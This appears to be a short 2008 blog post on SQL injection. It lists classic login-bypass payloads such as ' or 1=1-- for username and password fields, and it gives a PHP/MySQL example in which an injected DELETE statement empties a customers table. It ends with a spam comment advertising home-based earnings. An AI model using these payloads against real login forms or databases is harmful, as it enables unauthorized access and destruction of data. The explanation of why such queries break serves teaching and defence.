Some More Example Of SQL INJECTION

Continued from the last post,in this post, we will see some real example of the SQL Injection.

For the LOGIN Form :-

user:admin (you dont even have to put this.)

pass:' or 1=1--


user:' or 1=1--

admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

The injection attack has actually made our query behave differently than we intended. By using a single quote (') they have ended the string part of our MySQL query
username = ' '
and then added on to our WHERE statement with an OR clause of 1 (always true).
username = ' ' OR 1
This OR clause of 1 will always be true and so every single entry in the "customers" table would be selected by this statement!

Although the above example displayed a situation where an attacker could possibly get access to a lot of information they shouldn't have, the attacks can be a lot worse. For example an attacker could empty out a table by executing a DELETE statement.

MySQL & PHP Code:

$name_evil = "'; DELETE FROM customers WHERE 1 or username = '";
// our MySQL query builder really should check for injection
$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'";
// the new evil injection query would include a DELETE statement
echo "Injection: " . $query_evil;


SELECT * FROM customers WHERE username = ' '; DELETE FROM customers WHERE 1 or username = ' '
If you were run this query, then the injected DELETE statement would completely empty your "customers" table.



February 4, 2008 at 6:56 AM

Hello I just entered before I have to leave to the airport, it's been very nice to meet you, if you want here is the site I told you about where I type some stuff and make good money (I work from home): here it is